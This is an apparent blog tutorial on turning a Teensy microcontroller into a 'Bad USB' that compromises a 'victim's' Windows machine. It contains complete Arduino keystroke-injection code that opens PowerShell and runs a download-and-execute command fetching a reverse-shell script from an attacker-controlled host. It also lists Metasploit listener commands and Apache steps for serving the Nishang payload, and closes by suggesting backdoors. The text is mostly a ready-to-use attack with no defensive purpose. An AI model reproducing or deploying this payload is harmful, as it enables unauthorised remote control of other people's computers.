BAD USB using TEENSY
As I have watched many movies and series, most hackers perform their attacks via USB. The victims just plug in the USB and their systems will be compromised just like that.
So exploring how to perform this attack. I googled about this and found out about this good thing.
BAD USB’s:
Most common USB flash drives are exploitable due to the “BadUSB” vulnerability. This allows us, hackers, to reprogram the microcontroller in them to act as a human interface device (HID), e.g., a keyboard, and perform custom keystrokes on our target machine. The hackers program it or upload their desired code into the USB. Once the USB is plugged into the victim’s machine it executes the code.
The working of this will be like:
https://youtu.be/sbKN8FhGnqg
But it costs so much for everyone to afford it :-/
While searching for an alternate way I found out about this:
Teensy USB Development Board
The Teensy is a complete USB-based microcontroller development system, in a very small footprint, capable of implementing many types of projects.
{reference link: https://www.pjrc.com/teensy/}
This just cost a few bucks rather than comparing to these Bad USB.
Now we’ll proceed on making our bad USB <:-}
Setting up:
- Teensy USB (version 3.0+)
- Kali Linux (maybe in VM)
- Arduino IDE
Configuring the setup:
1.Arduino IDE
Download and Install Arduino IDE for compiling the code we will be working on.
2. Setting up Teensy USB on IDE
Download the setup for windows from:-https://www.pjrc.com/teensy/td_146/TeensyduinoInstall.exe
{for other platforms:- https://www.pjrc.com/teensy/td_download.html} and install the the setup.
Now go into your IDE and configure the tool
3. Coding:
code:
#include <paensy.h>
#include <Keyboard.h>
int ds = 500;void setup() {
// Configure the delay that everything else scales off of.
SetDelay(200);
// Configure the delay that the Morse code uses.
SetMorseDelay(250);// Perform an initial delay to give the USB time to prepare.
PerformInitDelay();// LED pin number, 13 for 3.1
// 11 for 2 and 2.x
SetLEDPin(13);
// Put the pin into output mode
pinMode(LED_PIN, OUTPUT);
// Turn on the LED pin so we know the device is running.
digitalWrite(LED_PIN, HIGH);
delay(100);
// Run
Keyboard.set_modifier(MODIFIERKEY_GUI);//windows button
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(500);
Keyboard.print(“powershell”);
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(500);// Modify 127.0.0.1 with your IP address and with your file
Keyboard.print(“IEX (New-Object Net.WebClient).DownloadString(‘http://10.1.75.77/ShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.1.75.77 -Port 9898”);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(500);
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1000);Keyboard.set_modifier(MODIFIERKEY_GUI);
Keyboard.set_key1(KEY_D);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1000);
}void loop()
{
// blink quickly when complete
digitalWrite(LED_PIN, HIGH);
delay(ds/2);
digitalWrite(LED_PIN, LOW);
delay(ds/2);
}
You can change the keyboard layout (key names) according to your victim’s machine.
Now as the code is ready we should compile it and upload it into our Teensy.
4.Setting up our Listener
Open up your terminal and type the following:
>msfconsole
>use exploit/multi/handler
>set payload windows/x64/shell reverse_tcp
>set lhost <your ip>
>set lport <the port you are listening>
>run
Remember the IP & Port addresses in the teensy code and in your listener should be the same.
5. Setting up the exploit :
As we can the teensy code is downloading the file from a link and executing it. So we need a server hosting the file.
In your Kali Linux, you have to set up a server to feed that file.
Follow these commands:
>sudo apt-get install apache2
>service apache2 start
Download the file from here: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
now do the following commands:
>mv Invoke-PowerShellTcp.ps1 ShellTcp.ps1
>cp ShellTcp.ps1 /var/www/html/
Finishing up
Now plug in the Teensy USB in the victim’s machine. As soon as it is plugged in, the keystrokes start to work which finally results in getting the reverse shell of the victim’s machine.
Now as you have got the reverse shell in the Metasploit you can change the payload and use it, by making backdoors and other stuff.